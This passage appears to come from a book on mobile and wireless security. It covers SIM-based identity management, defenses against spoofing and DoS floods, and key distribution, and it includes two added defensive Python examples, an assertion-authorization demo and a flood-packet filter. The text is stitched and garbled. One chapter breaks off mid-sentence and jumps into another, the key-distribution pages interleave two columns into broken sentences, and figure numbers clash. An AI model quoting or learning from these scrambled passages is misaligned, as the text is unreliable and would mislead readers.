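    cross_sp_ok, _ = hr.authorize(payload, tag)          # same assertion replayed at another SP
    tamper_ok, _ = shop.authorize(payload.replace(b'"age": 34', b'"age": 99'), tag)
    return shop_ok, ssn_leaked, cross_sp_ok, tamper_ok
```

Running demo() gives (True, False, False, False): the shop admits the user on the age attribute alone, the SSN the shop asked for is withheld because the federation agreement does not cover it, the same assertion is useless at the HR portal (different audience and trust key), and a modified attribute value fails verification. This is the property the text attributes to attribute-based authorization: a compromise at one provider does not become unbridled access across all of the user's accounts.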

Apart from possessing numerous usernames/passwords/PIN codes for remote (Web) service access, the user is also carrying many physical identities for proximity service access. These include credit card, bank card, home/office access cards, and so forth. Many researchers working in these areas are proposing smart cards, like the SIM/USIM currently used in mobile phones, as the secure storage place for the user's identity information, because it can be revoked, users nowadays can rarely be found without a mobile phone, and there are possibilities of security enhancements. Custom-made SIMs/USIMs having enough computational power and storage space can be used to manage users' identification information and multi-factor authentication mechanisms. Gemalto, a company providing digital security, is involved in developing sophisticated smart card (e.g., SIM/USIM) based online or off-line identity management with associated software, middleware, and server-based solutions. NXP, a semiconductor company (formerly a division of Philips), is also offering identification products in areas like government, banking, access control, and so forth using secure innovative contactless smart cards and chips. Credit card companies are running various trials for providing users' payment identity handling solutions using mobile phones and NFC technology. Tap N Go is the name of a contactless payment trial powered by MasterCard PayPass (2007) in the U.S. started in 2006. In the same year, Visa completed contactless-based mobile pilots in Malaysia and the United States, using NFC-enabled phones, complementing existing programs in Japan and Korea. In February 2007, Visa International and SK Telecom of South Korea announced the world's first contactless payment application on a universal SIM card which is personalized over-the-air based on Visa's recently introduced mobile platform ("Visa's mobile platform initiative," 2007).

Identity providers issue identities to each user. They have a very important central role in the identity management business. The identity provider manages users' identities and their access rights to various services securely. It provides the authentication and authorization services to the users. Who can be the identity providers in future identity management systems is a debatable issue. Liberty Alliance (Miller et al., 2004) believes that mobile operators are in a good position to become the most favored identity providers, because they possess valuable static and dynamic user information which can be transmitted to third parties in a controlled manner through an open standard Web service interface. Mobile operators also have the ability to seamlessly authenticate users with the phone number on behalf of the service providers (SPs). Many contradict such roles of mobile operators. Instead, more trusted third parties, like financial institutes and governments, are also well positioned to become preferred identity providers. They might provide identity services for their specific market and services that need stronger user identities. When a user wants to subscribe to a new wireless network, he/she asks the third party identity provider to add new identification data to his/her phone. In such a situation, it is possible that a third party can even manage the SIM/USIM, which is currently done by cellular operators. It is expected that the next-generation wireless network will have such flexibility.

Components of User Identities

Identity management in wireless service access needs to address device-level security, network-level security, and service-level security (Kuroda et al., 2004, p. 169). Therefore, the overall user identity comprises device, network, and service identities. The user's device is divided into two components, a personal smart card (e.g., SIM/USIM) and a mobile device with wireless access capabilities. The smart card includes user identification data that contains the user's public or shared-secret keys, and certificates for network operators and service providers. The card and the device need to be mutually authenticated in the initial setup phase because both devices have built no relationship of trust to exchange security information from the very beginning. Afterwards, the user identifies him/herself to the card, since it stores sensitive personal information, which is used for network- and service-level authentication. The user can identify through PIN, password, or biometrics. After these authentication procedures, the card delegates user identity information to the mobile device to authenticate wireless access and thereby, service access. The user expects to use services without being concerned about the individual characteristics of each wireless access. Network-level authentication verifies that the user is a subscriber and has wireless access to the right network. Service-level authentication verifies that the user is a subscribed user to the right services. In each case, service or network providers and the user device mutually authenticate each other. Figure 1 depicts the overview of device-, service-, and network-level identifications to ensure the security of user-device, network, and services for wireless service access.

Figure 1. User identifications to ensure device-, network-, and service-level security

Integrated Identity Management Mechanism

Every human being is playing numerous roles in life. To organize the user identities in a more structured way, all user identities can be broadly categorized into three areas based on the roles he/she exercises in real life (Chowdhury & Noll, 2006). These are personal identity (PID), corporate identity (CID), and social identity (SID). PIDs can be used to identify a user in his/her very personal and commercial service interactions. CIDs and SIDs can be used in professional and social, interpersonal interactions respectively. For example, PIDs include bank/credit card, home/office access card/code, and so forth. According to Dick Hardt, founder and CEO of SXIP Identity (keynote speech at the OSCON 2005 conference), an individual's interests, fondness, preferences, or tastes are also part of his/her identity. These roles can be dealt with by the user's SIDs. Some of these identities contain very sensitive user information, therefore very strict authentication requirements have to be met. Some others require less secure infrastructure as they possess not so sensitive user information.

Considering all these aspects, instead of storing the user's vast identity information in a single place (a user device), it can be distributed into two places. The less sensitive user identity information, especially his/her SIDs, can be stored in a secure network identity space. The most sensitive identity information like the user's PIDs will be stored in the user's personal device. The mobile phone (more correctly the SIM card) has been proposed as the user's personal device (Chowdhury & Noll, 2006). When the user subscribes to the identity services, the identity provider (IdP) issues a certificate to him/her. It will be stored in the device. At the same time, a secure identity space in the network will be allocated for the user too. The device identifies and authenticates the user to access his/her network identity space. When the user authenticates to the device and the network, he/she can also gain access to the network identity space (if required, an optional password can also protect such access). The user device holds the most sensitive user identity information. Depending on the security requirements of the services, the possession-based authentication (e.g., having a personal device) can be enhanced by a knowledge factor (e.g., PIN code). An additional knowledge-based authentication mechanism can be used here to grant access to sensitive PIDs stored in the device. This is how user identities can be stored in a distributed manner and multi-factor authentication mechanisms can protect the security of the user's identities.

In future service access scenarios, the user expects a hassle-free use of identities. In this regard an approach is expected to integrate all the user's identities to access every remote and proximity service into a single mechanism. The distributed identity infrastructure just being described can also

Vulnerability Analysis

attack by falsifying the source address of the network communication. This makes it more difficult to identify the sources of attack traffic. It is therefore important to use network switches that have MAC binding features that store the first MAC address that appears on a port and do not allow this mapping to be altered without authentication. To prevent IP spoofing, disable source routing on all internal routers and use ingress filtering. Web spoofing depends mainly upon social engineering tricks and it is thus important to educate users and to be generally aware of the address window in a browser that displays the Web address that they are directed to. That can help if some suspicious Web site address comes up. DNS spoofing can be prevented by securing the DNS servers and by implementing anti-IP address spoofing measures (Paul, Ben, & Steven, 2003). Some vendors have added access control lists (ACL), implemented through MAC address filtering, to increase security. MAC address filtering amounts to allowing predetermined clients with specific MAC addresses to authenticate and associate. While the addition of MAC address filtering increases security, it is not a perfect solution given that MAC addresses can be spoofed. Also, the process of manually maintaining a list of all MAC addresses can be time consuming and error prone. Therefore MAC address filtering is probably best left for only small and fairly static networks (Mohammed & Issac, 2005).

Filtering Techniques

Filtering requires being able to filter the flood packets. This can be achieved with a signature-based packet filter. If one can create signatures for typical flood packets (TCP packets with zero data size for example, or unusually large ICMP packets) and filter out those packets, one can then filter the flood packets while allowing "normal" traffic to proceed.

Another filtering option is to reject the first IP packet from any IP address. This works with many current generations of attack tools because they tend to use a flat distribution random number generator to generate spoofed source addresses, and they only use each random address once. Another possibility is to divert traffic based on IP protocol to different servers or even route it differently. Thus, for a Web server it might be possible to route ICMP and UDP traffic bound for the Web server somewhere else entirely, or even block it at the router, so that only TCP-based floods will succeed. This at least narrows the scope of attacks that can be made.

Another filtering technique is called ingress filtering. This filtering prevents spoofed attacks from entering the network by putting rules on point-of-entry routers that restrict source addresses to a known valid range.

Filtering can also be based on channel control. This method is known as channel control filtering and can be achieved by filtering out DDoS control messages; this prevents the attacker from causing the attack servers to begin the attack. This can also be accomplished using a signature-based packet filter. If we can develop signatures for most control channel packets, we can simply reject them at the control channel packet filter, and they will disappear from the network.

FUTURE TRENDS

Due to the rapid changes in threat level and attacking techniques, existing defense mechanisms may not be adequate to counter the threats of future attacks. Therefore, it is important for researchers to continue analyzing different threats as they emerge and develop more effective and efficient defense mechanisms. For instance, detecting distributed and automated attacks still remains a challenge. Due to the drawbacks of some of the existing solutions or defense mechanisms as well as the emergence of new attack tools, further study is needed to combine well-known security drawbacks with defense techniques that are already mature and very effective. Moreover, it is also important to look into the development of a DoS management framework for protecting, detecting, and reacting to attacks when they occur. The following summarizes expected future trends in DoS and DDoS attacks: attacks on emerging technologies; attacks against anti-DoS infrastructure; attacks with the aid of malware, adware, or spyware; recursive DNS attacks or the use of DNS servers for DoS attacks; and attacks against OpenEdge WebSpeed platforms, and so forth.

CONCLUSION

This chapter explores some of the security vulnerabilities associated with 802.11 wireless networks. Here basic issues with WEP and better protocols like TKIP and CCMP were discussed with some advice on security precautions. Later emphasis was given to DoS and DDoS attacks to show how complicated and varied they are in nature. DoS attacks are done quite effectively against wired and wireless networks and cost much in terms of the damage done. Defense mechanisms against such attacks are still not perfect and the chapter eventually reviews and explains some sets of defense mechanisms that could help against such attacks.

REFERENCES

Agarwal, S., Dawson, T., & Tryfonas, C. (2003). DDoS mitigation via regional cleaning centers (Tech. Rep. No. RR04-ATL-013177). Sprint ATL Research Report.

Blunk, L., & Vollbrecht, J. (1998). PPP extensible authentication protocol (EAP) (RFC 2284). Retrieved December 25, 2006, from http://www.ietf.org/rfc/rfc2284.txt

Cable, G. (2004). Wi-Fi protected access data encryption and integrity. Retrieved December 17, 2006, from http://www.microsoft.com/technet/community/columns/cableguy/cg1104.mspx

Cam-Winget, N., Housley, R., Wagner, D., & Walker, J. (2003). Security flaws in 802.11 data link protocols. Communications of the ACM, 35-39.

Christos, D., & Aikaterini, K. (2003). DoS attacks and defense mechanisms: Classifications and state-of-the-art. Computer Networks, 44, 643-666.

Craig, A. H. (2000). The latest in denial of service attacks: Smurfing description and information to minimize effects. Retrieved May 17, 2006, from http://www.pentics.net/denial-of-service/white-papers/smurf.cgi

Davidowicz, D. (1999). Domain name system (DNS) security. Retrieved June 23, 2006, from http://compsec101.antibozo.net/papers/dnssec/dnssec.html

Dierks, T., & Allen, C. (2006). The TLS protocol (RFC 2246). Retrieved December 7, 2006, from http://www.ietf.org/rfc/rfc2246.txt

Dworkin, M. (2004). Recommendation for block cipher modes of operation: The CCM mode of authentication and confidentiality. Retrieved November 17, 2006, from http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf

Earle, A. E. (2006). Wireless security handbook. Auerbach Publications, Taylor & Francis Group.

Fluhrer, S., Mantin, I., & Shamir, A. (2001). Weaknesses in the key scheduling algorithm of RC4. Retrieved July 25, 2005, from http://downloads.securityfocus.com/library/rc4_ksaproc.pdf

Fontana, J. (2007). Network World. Retrieved April 5, 2007, from http://www.networkworld.com/news/2007/011907-microsoft-secure-vpn-tunneling-protocol.html

Gast, M. (2002). 802.11 wireless networks—The definitive guide. CA: O'Reilly Media.

Greenhalgh, A., Handley, M., & Huici, F. (2005). Using routing and tunneling to combat DoS attacks. In Proceedings of the Workshop on Steps to Reducing Unwanted Traffic on the Internet.

Held, G. (2003). Securing wireless LAN. Sussex, England: John Wiley & Sons.

Hurton, M., & Mugge, C. (2003). Hack notes—Network security portable reference. CA: McGraw-Hill/Osborne.

In-Stat. (2006). In-stat market survey. Retrieved May 11, 2007, from http://www.in-stat.com
Issac, B., Jacob, S. M., & Mohammed, L. A. (2005). The art of war driving—A Malaysian case study. In Proceedings of IEEE International Conference on Networks (ICON) (pp. 124-129).

Kandula, S., Katabi, D., Jacob, M., & Berger, A. (2005). Botz-4-sale: Surviving organized DDoS attacks that mimic flash crowds. In Proceedings of the 2nd Symposium on Networked Systems Design and Implementation.

Lynn, M., & Baird, R. (2002). Advance 802.11 attack, Blackhat 2002. Retrieved June 19, 2006, from http://www.blackhat.com/html/bh-usa-02/bh-usa-02-speakers.html#baird

Marti, S., Giuli, T., Lai, K., & Baker, M. (2001). Mitigating routing behavior in mobile ad hoc networks. In Proceedings of Mobicom, Rome.

Mohammed, L. A., & Issac, B. (2005). DoS attacks and defense mechanisms in wireless networks. In Proceedings of the IEE Mobility Conference (Mobility 2005), Guangzhou, China (pp. P2-1A).

Papadimitratos, P., & Haas, Z. J. (2002). Secure routing for mobile ad hoc networks. In Proceedings of the SCS Communication Networks and Distributed Systems Modeling and Simulation Conference (CNDS 2002), San Antonio, TX.

Park, K., & Lee, H. (2001). On the effectiveness of route-based packet filtering for distributed DoS attack prevention in power-law Internets. In Proceedings of the ACM SIGCOMM '01 Conference on Applications, Technologies, Architectures, and Protocols for Computer Communications (pp. 15-26). New York: ACM Press.

Paul, C., Ben, C., & Steven, B. (2003). Security+ guide to network security fundamentals. Thomson Course Technology (pp. 47-84).

Perrig, A., Canetti, D., Tyger, D., & Song, D. (2000). Efficient authentication and signature of multicast streams over lossy channels. In Proceedings of the IEEE Symposium on Security and Privacy (pp. 90-100).

Phifer, L. (2007). WPA PSK crackers: Loose lips sink ships. Retrieved April 2, 2007, from http://www.wi-fiplanet.com/tutorials/article.php/3667586

Richard, W. (2005). Voice over wireless LAN adoption triples by 2007. Retrieved January 05, 2007, from http://www.infonetics.com/resources/purple.shtml?upna0wl. . 5 nr.shtm

Shields, C. (2002). What do we mean by network denial of service? In Proceedings of the 2002 IEEE Workshop on Information Assurance (pp. 196-203). U.S. Military Academy.

Strand, L. (2004). 802.1x port-based authentication HOWTO. Retrieved July 15, 2005, from http://www.tldp.org/HOWTO/8021X-HOWTO

Takahashi, T. (2004). WPA passive dictionary attack overview (White Paper).

Yih-Chun, H. (2006). Wormhole attacks in wireless networks. IEEE Journal on Selected Areas in Communications, 24(2), 370-380.

Additional Important Links/References:

CERT Coordination Center References

http://www.cert.org/advisories/CA-2000-11.html
http://www.cert.org/research/JHThesis/Chapter11.html
http://www.cert.org/incident_notes/IN-2000-04.html
http://www.cert.org/tech_tips/denial_of_service.html
http://www.cert.org/archive/pdf/DoS_trends.pdf
http://www.cert.org/research/isw/isw2000/papers/42.pdf

Other links

http://www.kb.cert.org/vuls/
http://www.usenix.org/publications/login/2000-7/apropos.html
http://www.iss.net
http://www-1.ibm.com/services/continuity/recover1.nsf/files/Downloads/file/$DOS.pdf
http://www.cymru.com/~robt/Docs/Articles/dos-and-vip.html

KEY TERMS

Denial of Service (DoS): Denial of service attacks are attacks that prevent legitimate users from receiving services from the service provider.

Distributed Denial of Service (DDoS): DDoS is a type of DoS attack conducted by using multiple sources that are distributed throughout the network.

Flooding Attack: A flooding attack involves the generation of spurious messages to increase traffic on the network, consuming the server's or network's resources.

Information Security: Information security is a mechanism dealing with providing confidentiality, integrity, authentication, and non-repudiation.

Network Security: Network security is a mechanism dealing with protection of the networking system as a whole and sustaining its capability to provide connectivity between the communicating entities.

Spoofing Attack: A spoofing attack involves the creation of packets with a forged or faked source IP address.

Wireless Networks: Wireless networks are based on a technology that uses radio waves or radio frequencies to transmit or send data.
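The filtering techniques described in this chapter's Filtering Techniques section (signature-based filtering of typical flood packets, rejecting the first packet from a never-seen source, diverting non-TCP traffic away from a Web server, and ingress filtering on a known valid source range) can be combined in one packet filter. The block below is an added example written for this page, not code from the chapter or from any vendor's product. The packet representation, the TEST-NET-3 addresses, the ICMP size limit and the per-source zero-data limit are assumed values. It goes one step beyond the text in one respect: because a zero-data TCP segment is also what every normal handshake looks like, that signature is applied only once a source exceeds a per-source limit, so ordinary clients are not dropped.

```python
"""Flood-packet filter: ingress rule, protocol diversion, signatures and
the first-packet rule, applied in that order to a constructed packet trace.

Added example, not code from the chapter. All addresses and thresholds
are assumptions chosen for the demonstration.
"""
import ipaddress
from collections import Counter


class FloodFilter:
    def __init__(self, valid_sources, web_server, max_icmp_len=1024, zero_data_limit=3):
        self.valid = [ipaddress.ip_network(n) for n in valid_sources]
        self.web_server = web_server
        self.max_icmp_len = max_icmp_len        # assumed: larger ICMP is a flood signature
        self.zero_data_limit = zero_data_limit  # assumed: zero-payload TCP allowed per source
        self.seen = set()                       # sources that already sent one packet
        self.zero_data = Counter()              # zero-payload TCP packets per source

    def classify(self, pkt):
        """Return (action, reason) for one packet; rules run in order."""
        src = ipaddress.ip_address(pkt["src"])
        # 1. Ingress filtering: the point-of-entry rule restricts source
        #    addresses to the known valid range, so spoofed sources are dropped.
        if not any(src in net for net in self.valid):
            return "drop", "ingress: source outside valid range"
        # 2. Diversion by IP protocol: only TCP has to reach the web server, so
        #    ICMP/UDP bound for it is routed elsewhere (or blocked at the router).
        if pkt["dst"] == self.web_server and pkt["proto"] in ("icmp", "udp"):
            return "divert", "non-TCP traffic for web server routed elsewhere"
        # 3. Signature rules for typical flood packets. Oversized ICMP needs no
        #    rate; zero-data TCP is normal in a handshake, so it only becomes a
        #    signature above the per-source limit.
        if pkt["proto"] == "icmp" and pkt["len"] > self.max_icmp_len:
            return "drop", "signature: oversized ICMP"
        if pkt["proto"] == "tcp" and pkt["payload_len"] == 0:
            self.zero_data[pkt["src"]] += 1
            if self.zero_data[pkt["src"]] > self.zero_data_limit:
                return "drop", "signature: zero-data TCP above per-source limit"
        # 4. First-packet rule: the first packet from a never-seen source is
        #    rejected. Tools that use each random spoofed address once never
        #    come back; a real client simply retransmits.
        if pkt["src"] not in self.seen:
            self.seen.add(pkt["src"])
            return "drop", "first packet from unseen source"
        return "accept", "normal traffic"

    def run(self, packets):
        return [self.classify(p) for p in packets]


WEB = "203.0.113.10"   # constructed: web server inside TEST-NET-3


def pkt(src, dst, proto, length=60, payload_len=0):
    return {"src": src, "dst": dst, "proto": proto, "len": length, "payload_len": payload_len}


# Constructed sample trace; the comment on each line gives the expected action.
SAMPLE = [
    pkt("203.0.113.55", WEB, "tcp"),                    # legit SYN, first packet: drop
    pkt("203.0.113.55", WEB, "tcp"),                    # retransmitted SYN: accept
    pkt("203.0.113.55", WEB, "tcp", 500, 440),          # HTTP request: accept
    pkt("198.51.100.7", WEB, "tcp"),                    # spoofed, outside range: drop
    pkt("198.51.100.9", WEB, "tcp"),                    # another single-use source: drop
    pkt("203.0.113.88", WEB, "udp", 1200, 1150),        # UDP at web server: divert
    pkt("203.0.113.77", "203.0.113.20", "icmp", 4000),  # oversized ICMP: drop
] + [pkt("203.0.113.99", WEB, "tcp") for _ in range(5)]  # zero-data burst from in-range host


def run_sample(sample=SAMPLE):
    """Return the list of actions for the sample trace."""
    return [action for action, _ in FloodFilter(["203.0.113.0/24"], WEB).run(sample)]


def summarize(sample=SAMPLE):
    """Count reasons: the view an operator wants from the filter log."""
    return Counter(reason for _, reason in FloodFilter(["203.0.113.0/24"], WEB).run(sample))
```

On the constructed trace, run_sample() returns drop, accept, accept, drop, drop, divert, drop, and then drop, accept, accept, drop, drop for the burst: the legitimate client loses only its first packet and is served on the retransmission, both out-of-range spoofed sources never get past the ingress rule, and the in-range burst is cut off once it exceeds the zero-data limit. The cost of the first-packet rule, one extra round trip for every new client, is visible in the same output, which is why the text presents it as one option among several rather than a universal answer.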




Chapter XI
Key Distribution and Management for Mobile Applications

György Kálmán
University Graduate Center – UniK, Norway

Josef Noll
University Graduate Center – UniK, Norway

ABSTRACT

This chapter deals with challenges raised by securing transport, service access, user privacy, and accounting in wireless environments. Key generation, delivery, and revocation possibilities are discussed and recent solutions are shown. Special focus is on efficiency and adaptation to the mobile. Device domains in personal area networks and home networks are introduced to provide personal digital rights management (DRM) solutions. The value of smart cards and other security tokens is shown and a secure and convenient transmission method is recommended based on the mobile phone communication technology.

A PROBLEM OF MEDIA ACCESS

On the dawn of ubiquitous network access, data protection is becoming more and more important. While in the past network connectivity was mainly provided by wired connections, which is still considered the most secure access method, current and future users are moving towards wireless access and only the backbone stays connected by wires. In a wired environment, eavesdropping exists, but is not as widespread and also not easy to implement. While methods exist to receive electromagnetic radiation from unshielded twisted pair (UTP) cables, quite good protection can already be achieved by transport layer encryption or by deploying shielded twisted pair (STP) or even fibre.

New technologies emerged in the wireless world, and especially the IEEE 802.11 family has drastically changed the way users connect to networks. The most basic requirement for new devices is the capability of supporting wireless service access. The mobile world introduced general packet radio service (GPRS), and third generation (3G) mobile systems provide permanent IP connectivity and, together with Wi-Fi access points, continuous wireless connectivity. Besides communications devices such as laptops and phones, also cars, machines, and home appliances nowadays come with wireless/mobile connectivity.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Key Distribution and Management for Mobile Applications

Protecting user data is of key importance for all communications, and especially for wireless communications, where eavesdropping, man-in-the-middle, and other attacks are much easier. With a simple wireless LAN (WLAN) card and corresponding software it is possible to catch, analyse, and potentially decrypt wireless traffic.

The implementation of the first WLAN encryption standard, wired equivalent privacy (WEP), had serious weaknesses. Encryption keys can be obtained through a laptop in promiscuous mode in less than a minute, and this can happen through a hidden attacker somewhere in the surroundings. Data protection is even worse in places with public access and on factory default WLAN access points without activated encryption. Standard Internet protocols such as simple mail transport protocol (SMTP) messages are not encoded, thus all user data are transmitted in plaintext. Thus, sending an e-mail over an open access point has the same effect as broadcasting the content. With default firewall settings an intruder has access to local files, since the local subnet is usually placed inside the trusted zone. These examples emphasise that wireless links need some kind of traffic encryption.

When the first widespread digital cellular network was developed around 1985, standardisation of the global system for mobile communication (GSM) introduced the A5 cryptographic algorithms, which can nowadays be cracked in real-time (A5/2) or near real-time (A5/1). A further security threat is the lack of mutual authentication between the terminal and the network. Only the terminal is authenticated; the user has to trust the network unconditionally. In the universal mobile telecommunications system (UMTS), strong encryption is applied on the radio part of the transmission and provides adequate security for current demands, but does not secure the transmission over the backbone. UMTS provides mutual authentication through an advanced mechanism for authentication and session key distribution, named authentication and key agreement (AKA).

Figure 1. A basic problem of broadcast environment

A LONG WAY TO SECURE COMMUNICATION

Applying some kind of cryptography does not imply a secured access. Communicating parties must negotiate the key used for encrypting the data. It should be obvious that the encryption key used for the communication session (session key) cannot be sent over the air in plaintext (see Figure 1). In order to enable encryption even for the first message, several solutions exist. The simplest one, as used in cellular networks, is a preshared key supplied to the mobile terminal beforehand. This key can then be used later for initialising the security infrastructure and can act as a master key in future authentications.

In more dynamic systems the use of preshared keys can be cumbersome. Most WLAN encryption methods support this kind of key distribution. The key is taken to the new unit with some kind of out-of-band method, for example with an external unit, as indicated in Figure 2. Practically all private and many corporate WLANs use static keys, allowing an eavesdropper to catch huge amounts of traffic and thus enabling easy decryption of the content. This implies that a system with just a secured access medium can be easily compromised. Non-aging keys can compromise even the strongest encryption, thus it is recommended to renew the keys from time to time.

Outside the telecom world it is harder to distribute keys beforehand, so key exchange protocols emerged, which offer protection from the first message and do not need any preshared secret. The most widespread protocol is the Diffie-Hellman (DH) key exchange of Figure 2, which allows two parties that have no prior knowledge of each other to jointly establish a shared secret key over an insecure communications channel. This protocol does not authenticate the nodes to each other, but enables the exchange of data which can be decoded only by the two parties. Malicious attackers may start a man-in-the-middle attack

Figure 2. (a) Diffie-Hellman key exchange and (b) out-of-band key delivery

Two keys, a public and a private, are generated. The public key can be sent in plaintext, because messages encrypted with the public key can only be decoded by the private key and vice versa. The two-way nature of public keys makes it possible to authenticate users to each other, since signatures generated with the private key can be checked with the public key. Message authenticity can be guar-
(see Figure 4). Since this problem is well-known, anteed. Still, the identity of the node is not proven.
severalmodificationsenableidentity based
The DH,for
signature proves only that the message was
example Boneh, Goh, and Boyen (2005) showed encoded by the node, which has a public key of the
a hierarchical identity based encryption method, entity we may want to communicate with.
which is operating in fact as a public key system, Identity can be ensured by using certificates.
where the public key is a used chosen string. CertificateauthoritiesCA) ( storepublickeysan
Public key infrastructure (PKI) can help de- after checking the owner’s identity out of band,
fending corresponding parties against man-in-the- prove their identity by signing the public key
middle attacks. Public key cryptography is based and user information with their own keys. This
on the non polynomial (NP) time problems, for methodisrequiredforfinancialtransactionsa
example of factorisation or elliptic curves. business and government operations. Without a


CA, the public keys can be gathered into a PKI, which provides an exchange service. Here, most commonly, a method called web of trust is used. A number of nodes who think that the key is authentic submit their opinion by creating a signature. The solution enables community or personal key management, with a considerable level of authenticity protection.

Figure 3. Principle of a man-in-the-middle attack

While public keys can be sent, private keys must be kept secret. Although they are usually protected with an additional password, this is the weakest point in the system. If the user saves a key in a program in order to enter the key automatically, the security provided by the system is equal to the security of the program's agent application. Private firewalls and operating system policies usually will not stop a well-equipped intruder.

Another security issue for terminals is the lack of tamper-resistant storage. Usage of smart cards is a solution to this issue, but introduces additional hardware requirements. The lack of secure storage is getting much attention in DRM schemes. Most DRM schemes use a software-based method, but hardware-assisted ones have lately been introduced as well.

All these authentication methods, secure storage, and rights management support secure data exchange, but they do not protect the privacy of user credentials, preferences, and profiles. Ad hoc networks, like personal area networks (PANs), which move around and are dynamically configured, are open to intrusion attacks on privacy. Thus, protection of user credentials in wireless environments is one of the focal points of current research. Before addressing privacy, we will first summarise issues in key management protocols.


FROM KEY EXCHANGE TO ACCESS CONTROL INFRASTRUCTURE

Mobility and wireless access introduced new problems in network and user management, as compared to fixed network installations with, for example, port-based access restrictions. The network operators want to protect the network against malicious intruders, charge the correct user for the use, and provide easy and open access to their valued services.

The first step to get access to an encrypted network is to negotiate the first session key. This has been solved in coordinated networks like mobile networks through pre-shared keys. Authentication and access control are provided by central entities to ensure operations.

In computer networks, which are not controlled in such a way and usually not backed up by central authorisation, authentication, and accounting (AAA), different methods have been created for connection control. The basic method is still to negotiate encryption keys based on a preshared secret. Typical preshared keys are a password for hash calculation, a one-time password sent via cell phone, or keys given on a USB stick.

There are several solutions to protect the data transmitted over a wireless link. In private networks, security based on preshared keys is a working solution. In corporate or public networks, a more robust solution is needed. The most promising way is to integrate session key negotiation into the AAA process. Since providers or companies have to identify the connected user, they rely on an AAA infrastructure and have encryption of user credentials as a compulsory policy. A certificate-based medium access control and AAA system is advised, where AAA messages can also carry the certificates needed to secure the message exchange.

As public key operations induce a lot of network traffic, the negotiated session keys have to be used in the most efficient way. Encryption protocols designed for wired environments, like transport layer security (TLS), do not consider the problems associated with broadcast transmissions and the limitations of mobile devices. In a wired, or at
least fixed, environment the computational cost of key negotiations is usually neglected. For example, TLS uses several public key operations to negotiate a session key. This can be a problem for mobile devices, since the computational cost is much higher in asymmetric encryption. The standard TLS suite uses lots of cryptographic operations and generates too large a message load on wireless links (see Figure 5). If a mobile device wants to execute mutual authentication with a service provider, with certificate exchanges, it can lead to big amounts of data transferred over the radio interface beside the high computing power needs.

Figure 4. TLS key negotiation

In environments with limited resources, authentication and identity management based on preshared keys is still the most effective solution. Badra and Hajjeh (2006) propose an extension to TLS which enables the use of preshared secrets instead of asymmetric encryption. This is in line with the efforts to keep resource needs at the required minimum level in mobile devices. A preshared key solution was also proposed by the 3rd Generation Partnership Projects (3GPP, 2004; 3GPP2, 2007) as an authentication method for wireless LAN interworking. The problem with the proposed solution is that preshared keys do not provide adequate secrecy or identity protection in Internet connections. To deal with this problem, the TLS key exchange method (TLS-KEM) provides identity protection, minimal resource need, and full compatibility with the original protocol suite, as seen in Figure 6. In direct comparison, the public key based TLS needs a lot more computing, data traffic, and deployment effort.

Figure 5. TLS-KEM key negotiation

In UMTS networks, an array of authentication keys is sent to the mobile in authentication vectors. In the computer world a good solution would be to use hash functions to calculate new session keys, as these consume little power and require little computing.

A moving terminal can experience a communication problem, as the overhead caused by key negotiation might extend the connection time to a network node. A preserved session key for use in the new network is a potential solution in a mobile environment, as it speeds up the node's authentication. Lee and Chung (2006) recommend a scheme which enables the reuse of session keys. Based on the AAA infrastructure, it is possible to forward the key to the new corresponding AAA server on a protected network and use it for authentication without compromising system security. This can reduce the delay for connecting, and also reduces the possibility of authentication failure. Since the old session key can be used for authenticating the node towards the new AAA server, connection to the home AAA is not needed any more. The
messages are exchanged as follows (Lee & Chung, 2006): when sending the authorisation request to the new network, the node also includes the old network address it had. The foreign agent connects to the new local AAA server and sends an authentication request. The new AAA server connects to the old one, sending a message to identify the user. The old AAA authenticates the message by checking the hash value included, and generates a nonce for the terminal and the foreign agent. The server composes an AAA-terminal answer, which consists of a plain nonce and a nonce encrypted using the key shared between the old foreign agent and the terminal. Then the whole message is signed and encrypted with the key used between the two AAA servers. When the new AAA receives it, it decrypts it and sends the message to the new foreign agent. Based on the plain nonce, the agent generates the key and sends down the reply, which also includes the nonce encrypted by the old AAA. After the authentication of the user towards the network, the user can start using services.

Key distribution and efficiency in e-commerce applications is another important aspect. The network's AAA usually does not exchange information with third parties, or cannot use the authentication data of the network access because of privacy issues. Current security demands usually require mutual identification of the communicating parties in an e-commerce application. This can easily lead to compromising the customer to companies (for example in a GSM network, the user has to trust the network unconditionally). If the user can also check the identity of the service provider, at least man-in-the-middle attacks are locked out.

When a user starts a new session with a service provider, this session should be based on a new key set. The session key has to be independent from the previous one in terms of traceability, and the user identity should not be deducible from the session key, thus ensuring user privacy. For mutual identification, a key exchange method is proposed by Kwak, Oh, and Won (2006), which uses hash values to reduce resource need. The key calculation is based on random values generated by the parties, which ensures key freshness.

The use of hash functions is recommended in mobile environments, providing better performance than public key based mechanisms (Lim, Lim, & Chung, 2006). Mobile IPv4 uses symmetric keys and hashes by default. Since symmetric keys are hard to manage, a certificate-based key exchange was recommended, but this demands more resources. To lower the resource demand, a composite architecture was recommended (Sufatrio, 1999). The procedure uses certificates only in places where the terminal does not require processing of the public key algorithm and does not require storage of the certificate. The result of the comparison shows that hash is by far the most efficient method in terms of key generation, but suffers from management difficulties. Lim et al. (2006) also demonstrate that a pure certificate-based authentication is unsuitable for mobile environments. Partial use of certificates and identity-based authentication with extensive use of hash functions can be a potential way ahead.


AUTHENTICATION OF DEVICE GROUPS

In a ubiquitous environment, moving networks appear. PANs and ad hoc connections based on various preferences emerge and fall apart. These devices communicate with each other and usually have very limited capabilities in terms of computing power and energy reserves. In order to provide secure communication between any parts of the network, hierarchical key management methods emerged (Kim, Ahn, & Oh, 2006). Here a single trusted server is used to manage the group key. These entities usually store the keys in a binary tree, where the network nodes are the leaves.

Public key operations are usually required when a terminal wants to connect to a group for the first time. A group management system needs frequent key generation rounds, because it has to ensure forward and backward secrecy. Strict key management policies ensure that no new node is capable of decoding former traffic and none of the old nodes have the possibility to decrypt current traffic. To adjust resource usage to the mobile environment, a management scheme which uses mainly simple operations like XOR and hash is advisable (Kim et al., 2006). As the key in the root of the
binary tree is used to authenticate the whole group, keys need to be regenerated when a node leaves the network. This procedure starts from the parent of the former node and goes up to the root. Then the management unit sends out the new keys in one message. Building a tree from keys ensures fast searches and a simple, clean structure. In addition, all keys in the internal nodes are group keys for the leaves under them, so a subset of devices can be easily addressed.

Figure 6. Keys in a binary tree

